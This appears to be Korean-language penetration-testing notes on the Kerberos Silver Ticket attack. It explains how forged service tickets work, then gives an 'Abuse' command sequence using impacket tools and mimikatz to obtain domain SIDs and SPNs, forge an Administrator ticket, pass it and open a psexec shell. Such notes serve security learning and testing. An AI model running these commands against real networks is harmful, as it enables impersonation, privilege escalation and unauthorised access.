Silver Tickets

Silver Tickets 공격은 공격자가 서비스 머신 계정을 장악하거나 해당 머신의 키 값을 확보했을 때, 서비스 티켓을 변조하여 다른 사용자를 가장한 서비스 이용이 가능한 공격입니다. 서비스 서버는 클라이언트가 제출한 서비스 티켓에 대해서 자신의 키로 복호화만 가능하다면 변조되었거나 탈취되었을 가능성에 대해서는 고려하지 않고 서비스를 이용할 수 있도록 허가합니다. 또한 이 과정에서 도메인 컨트롤러가 서비스 서버 이용에 대해 관여하는 단계는 없기 때문에 실버 티켓을 통한 사용자 가장을 모니터링 하는 것은 굉장히 어렵습니다. 공격 흐름은 다음과 같습니다.

1. 서비스 계정 키 획득

2. 서비스 키를 사용하여 TGS의 PAC 정보에서 다른 사용자의 권한 삽입

3. 변조된 서비스 티켓을 서비스 서버에 제출함에 따라 높은 권한으로 서비스 이용

Kerberos 프로토콜의 구현 측면에서 서비스 티켓의 PAC은 이중 서명 기능이 존재합니다. 하나는 서비스 계정의 키를 통해 서명되고, 다른 하나는 krbtgt의 키로 서명됩니다. 따라서 이중 서명이 활성화 되어 있다면, 서비스 계정의 키를 획득했다고 하더라도 실버 티켓을 생성할 수는 없습니다. 그러나 일반적으로 도메인 멤버의 로컬 시스템이나 서비스 계정은 KDC 서명을 검증하지 않고, 자신의 키로 한 1차 서명만 확인합니다. 단, 서비스 계정이 Trusted Computing Base 권한이 없는 일반 계정으로 동작하는 경우에는 KDC 서명을 검증할 수 있지만, 많은 윈도우 서비스가 로컬 시스템으로 동작하여 검증을 생략합니다. 따라서 대부분의 환경에서는 krbtgt의 패스워드 변경 여부가 실버 티켓의 유효성에 대해서 영향을 주지 못하며, 오직 서비스 계정의 패스워드 변경만이 실버 티켓을 폐기하는 방법입니다.

다음은 실버 티켓을 생성하기 위해 필요한 정보입니다.

• 도메인 SID

• 서비스 계정 키

• SPN

Abuse

실버 티켓에 필요한 준비물 3가지는 다음과 같이 준비합니다.

# 도메인 SID 획득
impacket-lookupsids <Domain>/<USER>:<PASS>@<IP>

# 사용자 NT Hash
https://codebeautify.org/ntlm-hash-generator

# SPN
impacket-GetUserSPNs <Domain>/<USER>:<PASS> -request

# 실버 티켓 생성
impacket-ticketer -nthash <NT Hash> -domain-sid <SID> -domain <Domain> -spn <SPN> -user-id 500 Administrator

# 티켓 환경변수 등록
export KRB5CCNAME=Administrator.ccache

# 서비스 이용
impacket-mssqlclient -k -no-pass <Domain> -windows-auth

# 쉘 획득
impacket-psexec -k -no-pass <Domain>

# 실버 티켓 생성
kerberos::golden /domain:<DOMAIN> /sid:<SID> /rc4:<HASH> /user:<USER> /target:<TARGET> /service:<Service>

# Pass The Ticket
kerberos::ptt <TICKET_FILE>

References